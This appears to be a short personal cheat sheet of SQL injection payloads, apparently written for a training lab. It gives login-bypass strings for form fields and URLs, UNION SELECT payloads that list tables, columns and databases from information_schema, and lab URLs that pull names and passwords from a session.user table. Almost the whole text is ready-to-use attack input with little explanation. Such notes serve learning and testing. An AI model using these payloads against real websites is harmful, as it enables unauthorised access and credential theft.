use logins; SELECT username,password FROM users
	1		3	3	    2
sqlbolt.com

#Post method (put this in username and password field)
admin' OR 1='1

#Get method (put this in the url)
?username=comrade' OR 1='1&passwd=comrade' OR 1='1

information_schema --> is a default database

#Union Seletion:
admin' UNION SELECT 1,2,3,4,5 from Information_Schema.Tables;#

#Show all Tables
admin' UNION SELECT TABLE_NAME,2,3,4,5 from Information_Schema.Tables;#

#Show all Columns
admin' UNION SELECT COLUMN_NAME,2,3,4,5 from Information_Schema.Columns;#

#Show all datatbases
admin' UNION SELECT SCHEMA_NAME,2,3,4,5 from Information_Schema.Schemata;#


admin' UNION SELECT table_schema,2,table_name,column_name,5 FROM Information_Schema.Columns;#
admin' UNION SELECT name,2,3,4,5 from session.user;#

-----------------------------------------------------------------
http://10.50.23.102/uniondemo.php?Selection=3&Submit=Submit
http://10.50.23.102/uniondemo.php?Selection=3 OR 1=1&Submit=Submit

http://10.50.23.102/uniondemo.php?Selection=3 UNION SELECT 1,2,3;
http://10.50.23.102/uniondemo.php?Selection=3 UNION SELECT name,pass,id from session.user;#
